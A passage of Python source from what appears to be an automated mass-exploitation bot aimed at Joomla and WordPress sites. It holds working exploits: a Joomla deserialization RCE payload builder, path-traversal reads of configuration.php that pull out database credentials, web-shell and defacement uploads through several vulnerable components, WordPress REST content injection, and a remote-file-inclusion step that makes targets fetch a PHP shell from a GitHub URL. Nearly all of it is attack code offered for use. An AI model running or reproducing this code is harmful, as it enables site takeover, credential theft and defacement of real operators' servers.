563. rr = requests.get('http://' + site + '/', headers=headers, cookies=cookies, timeout=5)
564. if rr:
565. requests.get('http://' + site + '/images/vuln2.php', timeout=5)
566. requests.get('http://' + site + '/tmp/vuln2.php', timeout=5)
567. ShellCheck = requests.get('http://' + site + '/images/vuln.php', timeout=5)
568. ShellCheck2 = requests.get('http://' + site + '/tmp/vuln.php', timeout=5)
569. if 'Vuln!!' in ShellCheck.text:
570. self.Print_vuln_Shell(site + '/images/vuln.php')
571. with open('result/Shell_results.txt', 'a') as writer:
572. writer.write('http://' + site + '/images/vuln.php' + '\n')
573. IndexCheck = requests.get('http://' + site + '/vuln.htm', timeout=5)
574. IndexCheck2 = requests.get('http://' + site + '/images/vuln.htm', timeout=5)
575. if 'Vuln!!' in IndexCheck.text:
576. self.Print_Vuln_index(site + '/vuln.htm')
577. with open('result/Index_results.txt', 'a') as writer:
578. writer.write('http://' + site + '/vuln.htm' + '\n')
579. elif 'Vuln!!' in IndexCheck2.text:
580. self.Print_Vuln_index(site + '/images/vuln.htm')
581. with open('result/Index_results.txt', 'a') as writer:
582. writer.write('http://' + site + '/images/vuln.htm' + '\n')
583. elif 'Vuln!!' in ShellCheck2.text:
584. self.Print_vuln_Shell(site + '/tmp/vuln.php')
585. with open('result/Shell_results.txt', 'a') as writer:
586. writer.write('http://' + site + '/tmp/vuln.php' + '\n')
587. IndexCheck = requests.get('http://' + site + '/vuln.htm', timeout=5)
588. IndexCheck2 = requests.get('http://' + site + '/images/vuln.htm', timeout=5)
589. if 'Vuln!!' in IndexCheck.text:
590. self.Print_Vuln_index(site + '/vuln.htm')
591. with open('result/Index_results.txt', 'a') as writer:
592. writer.write('http://' + site + '/vuln.htm' + '\n')
593. elif 'Vuln!!' in IndexCheck2.text:
594. self.Print_Vuln_index(site + '/images/vuln.htm')
595. with open('result/Index_results.txt', 'a') as writer:
596. writer.write('http://' + site + '/images/vuln.htm' + '\n')
597. else:
598. self.Print_NotVuln('RCE Joomla', site)
599. else:
600. self.Print_NotVuln('RCE Joomla', site)
601. except:
602. self.Print_NotVuln('RCE Joomla', site)
603. except:
604. self.Print_NotVuln('RCE Joomla', site)
605.  
606. def php_str_noquotes(self, data):
607. try:
608. encoded = ""
609. for char in data:
610. encoded += "chr({0}).".format(ord(char))
611. return encoded[:-1]
612. except:
613. pass
614.  
615. def generate_payload(self, php_payload):
616. try:
617. php_payload = "eval({0})".format(php_payload)
618. terminate = '\xf0\xfd\xfd\xfd';
619. exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
620. injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
621. exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
622. exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
623. return exploit_template
624. except:
625. pass
626.  
627.  
628. def Joomla_TakeADmin(self, site):
629. try:
630. GetVersion = requests.get('http://' + site + '/language/en-GB/en-GB.xml', timeout=5)
631. if 'version="3.' in GetVersion.text.encode('utf-8'):
632. os.system('python files/adminTakeover.py -u MArKAntoni -p MArKAntoni -e ' +
633. self.EMail + ' http://' + site)
634. except:
635. self.Print_NotVuln('Maybe Add Admin 3.x', site)
636.  
637. def Com_s5_media_player(self, site):
638. try:
639. Exp = 'http://' + site + \
640. '/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA='
641. GetConfig = requests.get(Exp, timeout=5)
642. if 'JConfig' in GetConfig.text.encode('utf-8'):
643. self.Print_vuln_Config(site)
644. with open('result/Config_results.txt', 'a') as ww:
645. ww.write('Full Config Path : ' + Exp + '\n')
646. try:
647. Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
648. Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
649. Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
650. Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
651. with open('result/Config_results.txt', 'a') as ww:
652. ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
653. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
654. 0] + '\n---------------------\n')
655. except:
656. pass
657. else:
658. self.Print_NotVuln('Com_s5_media_player', site)
659. except:
660. self.Print_NotVuln('Com_s5_media_player', site)
661.  
662. def Com_Hdflvplayer(self, site):
663. try:
664. Exp = 'http://' + site + \
665. '/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php'
666. GetConfig = requests.get(Exp, timeout=5)
667. if 'JConfig' in GetConfig.text.encode('utf-8'):
668. self.Print_vuln_Config(site)
669. with open('result/Config_results.txt', 'a') as ww:
670. ww.write('Full Config Path : ' + Exp + '\n')
671. try:
672. Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
673. Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
674. Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
675. Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
676. with open('result/Config_results.txt', 'a') as ww:
677. ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
678. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
679. 0] + '\n---------------------\n')
680. except:
681. pass
682. else:
683. self.Print_NotVuln('Com_Hdflvplayer', site)
684. except:
685. self.Print_NotVuln('Com_Hdflvplayer', site)
686.  
687. def Com_Joomanager(self, site):
688. try:
689. Exp = 'http://' + site + \
690. '/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php'
691. GetConfig = requests.get(Exp, timeout=5)
692. if 'JConfig' in GetConfig.text.encode('utf-8'):
693. self.Print_vuln_Config(site)
694. with open('result/Config_results.txt', 'a') as ww:
695. ww.write('Full Config Path : ' + Exp + '\n')
696. try:
697. Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
698. Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
699. Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
700. Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
701. with open('result/Config_results.txt', 'a') as ww:
702. ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
703. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
704. 0] + '\n---------------------\n')
705. except:
706. self.Print_NotVuln('Com_Joomanager', site)
707. else:
708. self.Print_NotVuln('Com_Joomanager', site)
709. except:
710. self.Print_NotVuln('Com_Joomanager', site)
711.  
712.  
713. def Com_Macgallery(self, site):
714. try:
715. Exp = 'http://' + site + '/index.php?option=com_macgallery&view=download&albumid=../../configuration.php'
716. GetConfig = requests.get(Exp, timeout=5)
717. if 'JConfig' in GetConfig.text.encode('utf-8'):
718. self.Print_vuln_Config(site)
719. with open('result/Config_results.txt', 'a') as ww:
720. ww.write('Full Config Path : ' + Exp + '\n')
721. try:
722. Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
723. Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
724. Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
725. Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
726. with open('result/Config_results.txt', 'a') as ww:
727. ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
728. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
729. 0] + '\n---------------------\n')
730. except:
731. self.Print_NotVuln('Com_Macgallery', site)
732. else:
733. self.Print_NotVuln('Com_Macgallery', site)
734. except:
735. self.Print_NotVuln('Com_Macgallery', site)
736.  
737. def Com_CCkJseblod(self, site):
738. try:
739. Exp = 'http://' + site + '/index.php?option=com_cckjseblod&task=download&file=configuration.php'
740. GetConfig = requests.get(Exp, timeout=5)
741. if 'JConfig' in GetConfig.text.encode('utf-8'):
742. self.Print_vuln_Config(site)
743. with open('result/Config_results.txt', 'a') as ww:
744. ww.write('Full Config Path : ' + Exp + '\n')
745. try:
746. Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
747. Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
748. Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
749. Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
750. with open('result/Config_results.txt', 'a') as ww:
751. ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
752. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[0] + '\n---------------------\n')
753. except:
754. self.Print_NotVuln('Com_CCkjseblod', site)
755. else:
756. self.Print_NotVuln('Com_CCkjseblod', site)
757. except:
758. self.Print_NotVuln('Com_CCkjseblod', site)
759.  
760. def Com_MyBlog(self, site):
761. try:
762. fileindex = {'fileToUpload': open(self.Jce_Deface_image, 'rb')}
763. Exp = 'http://' + site + '/index.php?option=com_myblog&task=ajaxupload'
764. GoT = requests.post(Exp, files=fileindex, timeout=5)
765. if 'success' or 'File exists' in GoT.text.encode('utf-8'):
766. if '/images/pwn' in GoT.text.encode('utf-8'):
767. IndeXpath = 'http://' + site + '/images/pwn.gif'
768. else:
769. try:
770. GetPAth = re.findall("source: '(.*)'", GoT.text.encode('utf-8'))
771. IndeXpath = GetPAth[0]
772. except:
773. IndeXpath = 'http://' + site + '/images/pwn.gif'
774. CheckIndex = requests.get(IndeXpath, timeout=5)
775. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
776. self.Print_Vuln_index(site + '/images/pwn.gif')
777. with open('result/Index_results.txt', 'a') as writer:
778. writer.write(IndeXpath + '\n')
779. else:
780. self.Print_NotVuln('Com_MyBlog', site)
781. else:
782. self.Print_NotVuln('Com_MyBlog', site)
783. except:
784. self.Print_NotVuln('Com_MyBlog', site)
785.  
786. def Com_Jdownloads_shell(self, site):
787. try:
788. fileindex = {'file_upload': (self.ZipJd, open(self.ZipJd, 'rb'), 'multipart/form-data'),
789. 'pic_upload': (self.jdShell, open(self.jdShell, 'rb'), 'multipart/form-data')}
790. post_data = {
791. 'name': 'ur name',
792. 'mail': 'TTTntsfT@aa.com',
793. 'catlist': '1',
794. 'filetitle': "lolz",
795. 'description': "<p>zot</p>",
796. '2d1a8f3bd0b5cf542e9312d74fc9766f': 1,
797. 'send': 1,
798. 'senden': "Send file",
799. 'description': "<p>qsdqsdqsdqsdqsdqsdqsd</p>",
800. 'option': "com_jdownloads",
801. 'view': "upload"
802. }
803. Exp = 'http://' + site + '/index.php?option=com_jdownloads&Itemid=0&view=upload'
804. Got = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
805. if '/upload_ok.png' in Got.text.encode('utf-8'):
806. checkUrl = 'http://' + site + '/images/jdownloads/screenshots/' + self.jdShell.split('/')[1]
807. Check = requests.get(checkUrl, timeout=5)
808. if 'Vuln!!' in Check.text:
809. ChecksHell = requests.get('http://' + site + '/images/vuln.php', timeout=5)
810. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
811. if 'Vuln!!' in ChecksHell.text.encode('utf-8'):
812. self.Print_vuln_Shell(site + '/images/vuln.php')
813. with open('result/Shell_results.txt', 'a') as writer:
814. writer.write(site + '/images/vuln.php' + '\n')
815. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
816. self.Print_Vuln_index(site + '/vuln.htm')
817. with open('result/Index_results.txt', 'a') as writer:
818. writer.write(site + '/vuln.htm' + '\n')
819. else:
820. self.Com_Jdownloads(site)
821. else:
822. self.Com_Jdownloads(site)
823. else:
824. self.Com_Jdownloads(site)
825. except:
826. self.Com_Jdownloads(site)
827.  
828.  
829. def Com_Jdownloads(self, site):
830. try:
831. fileindex = {'file_upload': (self.ZipJd, open(self.ZipJd, 'rb'),'multipart/form-data'),
832. 'pic_upload': (self.Jce_Deface_image, open(self.Jce_Deface_image, 'rb'), 'multipart/form-data')}
833. post_data = {
834. 'name': 'ur name',
835. 'mail': 'TTTnstT@aa.com',
836. 'catlist': '1',
837. 'filetitle': "lolz",
838. 'description': "<p>zot</p>",
839. '2d1a8f3bd0b5cf542e9312d74fc9766f': 1,
840. 'send': 1,
841. 'senden': "Send file",
842. 'description': "<p>qsdqsdqsdqsdqsdqsdqsd</p>",
843. 'option': "com_jdownloads",
844. 'view': "upload"
845. }
846. Exp = 'http://' + site + '/index.php?option=com_jdownloads&Itemid=0&view=upload'
847. Got = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
848. if '/upload_ok.png' in Got.text.encode('utf-8'):
849. checkUrl = 'http://' + site + '/images/jdownloads/screenshots/' + self.Jce_Deface_image.split('/')[1]
850. Check = requests.get(checkUrl, timeout=5)
851. if 'GIF89a' in Check.text:
852. self.Print_Vuln_index(site + '/images/jdownloads/screenshots/' +
853. self.Jce_Deface_image.split('/')[1])
854. with open('result/Index_results.txt', 'a') as writer:
855. writer.write(checkUrl + '\n')
856. else:
857. self.Print_NotVuln('Com_Jdownloads', site)
858. else:
859. self.Print_NotVuln('Com_Jdownloads', site)
860. except:
861. self.Print_NotVuln('Com_Jdownloads', site)
862.  
863.  
864. def Com_Fabric(self, site):
865. try:
866. fileindex = {'userfile': (self.TextindeX, open(self.TextindeX, 'rb'), 'multipart/form-data')}
867. post_data = {
868. "name": "me.php",
869. "drop_data": "1",
870. "overwrite": "1",
871. "field_delimiter": ",",
872. "text_delimiter": "&quot;",
873. "option": "com_fabrik",
874. "controller": "import",
875. "view": "import",
876. "task": "doimport",
877. "Itemid": "0",
878. "tableid": "0"
879. }
880. Exp = 'http://' + site + "/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table="
881. requests.post(Exp, files=fileindex, data=post_data, timeout=5)
882. Check = requests.get('http://' + site + '/media/' + self.TextindeX.split('/')[1])
883. if 'Vuln!!' in Check.text:
884. self.Print_Vuln_index(site + '/media/' + self.TextindeX.split('/')[1])
885. with open('result/Index_results.txt', 'a') as writer:
886. writer.write(site + '/media/' + self.TextindeX.split('/')[1] + '\n')
887. else:
888. self.Print_NotVuln('Com_Fabric', site)
889. except:
890. self.Print_NotVuln('Com_Fabric', site)
891.  
892.  
893. def Com_AdsManager(self, site):
894. try:
895. fileindex = {'file': open(self.Jce_Deface_image, 'rb')}
896. post_data = {"name": self.Jce_Deface_image.split('/')[1]}
897. Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
898. GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
899. if '"jsonrpc"' in GoT.text.encode('utf-8'):
900. Check = requests.get('http://' + site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1], timeout=5)
901. if 'GIF89a' in Check.text.encode('utf-8'):
902. self.Print_Vuln_index(site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1])
903. with open('result/Index_results.txt', 'a') as writer:
904. writer.write(site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1] + '\n')
905. else:
906. self.Print_NotVuln('Com_AdsManager', site)
907. except:
908. self.Print_NotVuln('Com_AdsManager', site)
909.  
910. def Com_AdsManager_Shell(self, site):
911. try:
912. fileindex = {'file': open(self.indeX, 'rb')}
913. post_data = {"name": "vuln.php"}
914. Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
915. GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
916. if '"jsonrpc"' in GoT.text.encode('utf-8'):
917. requests.post(Exp, files=fileindex, data={"name": "vuln.phP"}, timeout=5)
918. requests.post(Exp, files=fileindex, data={"name": "vuln.phtml"}, timeout=5)
919. Check = requests.get('http://' + site + '/tmp/plupload/vuln.php', timeout=5)
920. Check2 = requests.get('http://' + site + '/tmp/plupload/vuln.phP', timeout=5)
921. Check3 = requests.get('http://' + site + '/tmp/plupload/vuln.phtml', timeout=5)
922. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
923. CheckShell = requests.get('http://' + site + '/images/vuln.php', timeout=5)
924.  
925. if 'Vuln!!' in Check.text.encode('utf-8'):
926. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
927. self.Print_vuln_Shell(site + '/images/vuln.php')
928. with open('result/Shell_results.txt', 'a') as writer:
929. writer.write(site + '/images/vuln.php' + '\n')
930. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
931. self.Print_Vuln_index(site + '/vuln.htm')
932. with open('result/Index_results.txt', 'a') as writer:
933. writer.write(site + '/vuln.htm' + '\n')
934. else:
935. self.Com_AdsManager(site)
936. elif 'Vuln!!' in Check2.text.encode('utf-8'):
937. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
938. self.Print_vuln_Shell(site + '/images/vuln.php')
939. with open('result/Shell_results.txt', 'a') as writer:
940. writer.write(site + '/images/vuln.php' + '\n')
941. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
942. self.Print_Vuln_index(site + '/vuln.htm')
943. with open('result/Index_results.txt', 'a') as writer:
944. writer.write(site + '/vuln.htm' + '\n')
945. else:
946. self.Com_AdsManager(site)
947. elif 'Vuln!!' in Check3.text.encode('utf-8'):
948. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
949. self.Print_vuln_Shell(site + '/images/vuln.php')
950. with open('result/Shell_results.txt', 'a') as writer:
951. writer.write(site + '/images/vuln.php' + '\n')
952. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
953. self.Print_Vuln_index(site + '/vuln.htm')
954. with open('result/Index_results.txt', 'a') as writer:
955. writer.write(site + '/vuln.htm' + '\n')
956. else:
957. self.Com_AdsManager(site)
958. else:
959. self.Com_AdsManager(site)
960. except:
961. self.Com_AdsManager(site)
962.  
963. def JCE_shell(self, site):
964. try:
965. fileShell = {'Filedata': open(self._shell, 'rb')}
966. post_data = {'upload-dir': '/', 'upload-overwrite': '0', 'action': 'upload'}
967. Exp = 'http://' + site +\
968. '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form'
969. Post = requests.post(Exp, files=fileShell, data=post_data, timeout=5)
970. OtherMethod = '"text":"' + self._shell.split('/')[1] + '"'
971. if OtherMethod in Post.text.encode('utf-8'):
972. PrivMethod = {'json': "{\"fn\":\"folderRename\",\"args\":[\"/" + self._shell.split('/')[1]
973. + "\",\"./../../images/vuln.php\"]}"}
974. try:
975. privExploit = 'http://' + site + '/index.php?option=com_jce&task=' \
976. 'plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw'
977. requests.post(privExploit, data=PrivMethod, timeout=5)
978. try:
979. VulnCheck = requests.get('http://' + site + '/images/vuln.php', timeout=5)
980. if 'Vuln!!' in VulnCheck.text:
981. self.Print_vuln_Shell(site + '/images/vuln.php')
982. with open('result/Shell_results.txt', 'a') as writer:
983. writer.write(site + '/images/vuln.php' + '\n')
984. self.Jce_Test(site)
985. else:
986. self.Jce_Test(site)
987. except:
988. self.Jce_Test(site)
989. except:
990. self.Jce_Test(site)
991.  
992. else:
993. self.Jce_Test(site)
994. except:
995. self.Jce_Test(site)
996.  
997. def Jce_Test(self, site):
998. try:
999. fileDeface = {'Filedata': open(self.Jce_Deface_image, 'rb')}
1000. post_data = {'upload-dir': '../../', 'upload-overwrite': '0', 'action': 'upload'}
1001. Exp = 'http://' + site +\
1002. '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form'
1003. Post = requests.post(Exp, files=fileDeface, data=post_data, timeout=5)
1004. OtherMethod = '"text":"' + self.Jce_Deface_image.split('/')[1] + '"'
1005. if OtherMethod in Post.text.encode('utf-8'):
1006. self.Print_Vuln_index(site + '/' + self.Jce_Deface_image.split('/')[1])
1007. with open('result/Index_results.txt', 'a') as writer:
1008. writer.write(site + '/' + self.Jce_Deface_image.split('/')[1] + '\n')
1009. elif OtherMethod not in Post.text.encode('utf-8'):
1010. post_data2 = {'upload-dir': '../', 'upload-overwrite': '0', 'action': 'upload'}
1011. Post = requests.post(Exp, files=fileDeface, data=post_data2, timeout=5)
1012. if OtherMethod in Post.text.encode('utf-8'):
1013. self.Print_Vuln_index(site + '/images/' + self.Jce_Deface_image.split('/')[1])
1014. with open('result/Index_results.txt', 'a') as writer:
1015. writer.write(site + '/images/' + self.Jce_Deface_image.split('/')[1] + '\n')
1016. else:
1017. self.Print_NotVuln('Com_JCE', site)
1018. else:
1019. self.Print_NotVuln('Com_JCE', site)
1020. except:
1021. self.Print_NotVuln('Com_JCE', site)
1022.  
1023.  
1024. def alberghiExploit(self, site):
1025. try:
1026. fileDeface = {'userfile': open(self.Jce_Deface_image, 'rb')}
1027. Exp = 'http://' + site + '/administrator/components/com_alberghi/upload.alberghi.php'
1028. Check = requests.get(Exp, timeout=5)
1029. if 'class="inputbox" name="userfile"' in Check.text.encode('utf-8'):
1030. Post = requests.post(Exp, files=fileDeface, timeout=5)
1031. if 'has been successfully' or 'already exists' in Post.text.encode('utf-8'):
1032. CheckIndex = requests.get(site + '/administrator/components/com_alberghi/' +
1033. self.Jce_Deface_image.split('/')[1], timeout=5)
1034. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
1035. with open('result/Index_results.txt', 'a') as writer:
1036. writer.write(site + '/administrator/components/com_alberghi/' +
1037. self.Jce_Deface_image.split('/')[1] + '\n')
1038. self.Print_Vuln_index(site + '/administrator/components/com_alberghi/' +
1039. self.Jce_Deface_image.split('/')[1])
1040. else:
1041. self.Print_NotVuln('com_alberghi', site)
1042. else:
1043. self.Print_NotVuln('com_alberghi', site)
1044. else:
1045. self.Print_NotVuln('com_alberghi', site)
1046. except:
1047. self.Print_NotVuln('com_alberghi', site)
1048.  
1049. def CateGory_page_icons(self, site):
1050. try:
1051. ChckVln = requests.get('http://' + site + '/wp-content/plugins/category-page-icons/css/menu.css', timeout=5)
1052. if ChckVln.status_code == 200:
1053. Exp = 'http://' + site + '/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php'
1054. fileDeface = {'wpdev-async-upload': open(self.Jce_Deface_image, 'rb')}
1055. PostDAta = {'dir_icons': '../../../',
1056. 'submit': 'upload'}
1057. requests.post(Exp, files=fileDeface, data=PostDAta, timeout=5)
1058. CheckIndex = requests.get('http://' + site + '/wp-content/' + self.Jce_Deface_image.split('/')[1], timeout=5)
1059. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
1060. with open('result/Index_results.txt', 'a') as writer:
1061. writer.write(site + '/wp-content/' + self.Jce_Deface_image.split('/')[1] + '\n')
1062. self.Print_Vuln_index(site + '/wp-content/' + self.Jce_Deface_image.split('/')[1])
1063. else:
1064. self.Print_NotVuln('CateGory_page_icons', site)
1065. else:
1066. self.Print_NotVuln('CateGory_page_icons', site)
1067. except:
1068. self.Print_NotVuln('CateGory_page_icons', site)
1069.  
1070.  
1071. def Downloads_Manager(self, site):
1072. try:
1073. Checkvuln = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/img/unlock.gif', timeout=5)
1074. if 'GIF89a' in Checkvuln.text.encode('utf-8'):
1075. PostDAta = {'dm_upload': ''}
1076. fileDeface = {'upfile': open(self.Jce_Deface_image, 'rb')}
1077. fileShell = {'upfile': open(self.pagelinesExploitShell, 'rb')}
1078. requests.post('http://' + site, data=PostDAta, files=fileDeface, timeout=5)
1079. CheckIndex = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' +
1080. self.Jce_Deface_image.split('/')[1])
1081. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
1082. requests.post('http://' + site, data=PostDAta, files=fileShell, timeout=5)
1083. requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' +
1084. self.pagelinesExploitShell.split('/')[1], timeout=5)
1085. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
1086. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
1087. self.Print_vuln_Shell(site + '/wp-content/plugins/downloads-manager/upload/' +
1088. self.pagelinesExploitShell.split('/')[1])
1089. self.Print_Vuln_index(site + '/vuln.htm')
1090. with open('result/Shell_results.txt', 'a') as writer:
1091. writer.write(site + '/wp-content/plugins/downloads-manager/upload/' +
1092. self.pagelinesExploitShell.split('/')[1] + '\n')
1093. with open('result/Index_results.txt', 'a') as writer:
1094. writer.write(site + '/vuln.htm' + '\n')
1095. else:
1096. self.Print_Vuln_index(site + '/wp-content/plugins/downloads-manager/upload/' +
1097. self.Jce_Deface_image.split('/')[1])
1098. with open('result/Index_results.txt', 'a') as writer:
1099. writer.write(site + '/wp-content/plugins/downloads-manager/upload/' +
1100. self.Jce_Deface_image.split('/')[1] + '\n')
1101. else:
1102. self.Print_NotVuln('Downloads-Manager', site)
1103. else:
1104. self.Print_NotVuln('Downloads-Manager', site)
1105. except:
1106. self.Print_NotVuln('Downloads-Manager', site)
1107.  
1108. def GetWordpressPostId(self, zzz):
1109. try:
1110. PostId = requests.get('http://' + zzz + '/wp-json/wp/v2/posts/', timeout=5)
1111. wsx = re.findall('"id":(.+?),"date"', PostId.text)
1112. postid = wsx[1].strip()
1113. return postid
1114. except:
1115. pass
1116.  
1117. def wp_content_injection(self, site):
1118. try:
1119. zaq = self.GetWordpressPostId(site)
1120. headers = {'Content-Type': 'application/json'}
1121. xxx = str(zaq) + 'bbx'
1122. data = json.dumps({
1123. 'content': '<h1>Vuln!! Path it now!!\n<p><title>Vuln!! Path it now!!<br />\n</title></p></h1>\n',
1124. 'title': 'Vuln!! Path it now!!',
1125. 'id': xxx,
1126. 'link': '/x-htm/',
1127. 'slug': '"/x-htm/"'
1128. })
1129. GoT = requests.post('http://' + site + '/wp-json/wp/v2/posts/' + str(zaq), data=data, headers=headers, timeout=10)
1130. if GoT:
1131. CheckIndex = 'http://' + site + '/x.htm'
1132. zcheck = requests.get(CheckIndex, timeout=10)
1133. if 'Vuln!!' in zcheck.text:
1134. self.Print_Vuln_index(site + '/x.htm')
1135. with open('result/Index_results.txt', 'a') as writer:
1136. writer.write(site + '/x.htm' + '\n')
1137. else:
1138. self.Print_NotVuln('Wordpress 4.7 Content Injection', site)
1139. else:
1140. self.Print_NotVuln('Wordpress 4.7 Content Injection', site)
1141. except:
1142. self.Print_NotVuln('Wordpress 4.7 Content Injection', site)
1143.  
1144. def Wp_Job_Manager(self, site):
1145. try:
1146. Exploit = '/jm-ajax/upload_file/'
1147. CheckVuln = requests.get('http://' + site + Exploit, timeout=5)
1148. if '"files":[]' in CheckVuln.text.encode('utf-8'):
1149. try:
1150. IndeXfile = {'file[]': open(self.Jce_Deface_image, 'rb')}
1151. GoT = requests.post('http://' + site + Exploit, files=IndeXfile, timeout=5)
1152. GetIndeXpath = re.findall('"url":"(.*)"', GoT.text.encode('utf-8'))
1153. IndeXpath = GetIndeXpath[0].split('"')[0].replace('\/', '/').split('/wp-content')[1]
1154. UploadedIndEX = site + '/wp-content' + IndeXpath
1155. Checkindex = requests.get('http://' + UploadedIndEX, timeout=5)
1156. if 'GIF89a' in Checkindex.text.encode('utf-8'):
1157. self.Print_Vuln_index(UploadedIndEX)
1158. with open('result/Index_results.txt', 'a') as writer:
1159. writer.write(UploadedIndEX + '\n')
1160. else:
1161. self.Print_NotVuln('Wp-Job-Manager', site)
1162. except:
1163. self.Print_NotVuln('Wp-Job-Manager', site)
1164. else:
1165. self.Print_NotVuln('Wp-Job-Manager', site)
1166. except:
1167. self.Print_NotVuln('Wp-Job-Manager', site)
1168.  
1169.  
1170. def wp_mobile_detector(self, site):
1171. try:
1172. ExploitShell = '/wp-content/plugins/wp-mobile-detector/resize.php?src=' \
1173. 'https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/settings_auto.php'
1174. ExploitGifUpload = '/wp-content/plugins/wp-mobile-detector/resize.php?src=' \
1175. 'https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/pwn.gif'
1176.  
1177. Ex = '/wp-content/plugins/wp-mobile-detector/resize.php'
1178. GoT = requests.get('http://' + site + Ex, timeout=5)
1179. if 'GIF89a' in GoT.text.encode('utf-8'):
1180. requests.get('http://' + site + ExploitGifUpload)
1181. requests.get('http://' + site + ExploitShell)
1182. PathGif = '/wp-content/plugins/wp-mobile-detector/cache/pwn.gif'
1183. PathShell = '/wp-content/plugins/wp-mobile-detector/cache/settings_auto.php'
1184. Check1 = 'http://' + site + PathGif
1185. Check2 = 'http://' + site + PathShell
1186. CheckIndex = requests.get(Check1, timeout=5)
1187. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
1188. CheckShell = requests.get(Check2, timeout=5)
1189. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
1190. Xshell = requests.get("http://" + site + "/wp-content/vuln.php", timeout=5)
1191. if 'Vuln!!' in Xshell.text.encode('utf-8'):
1192. self.Print_vuln_Shell(site + "/wp-content/vuln.php")
1193. with open('result/Shell_results.txt', 'a') as writer:
1194. writer.write(site + "/wp-content/vuln.php" + '\n')
1195. Xindex = requests.get("http://" + site + "/vuln.htm", timeout=5)
1196. if 'Vuln!!' in Xindex.text.encode('utf-8'):
1197. self.Print_Vuln_index(site + '/vuln.htm')
1198. with open('result/Index_results.txt', 'a') as writer:
1199. writer.write(site + '/vuln.htm' + '\n')
1200. else:
1201. self.Print_Vuln_index(site + '/wp-content/plugins/wp-mobile-detector/cache/pwn.gif')
1202. with open('result/Index_results.txt', 'a') as writer:
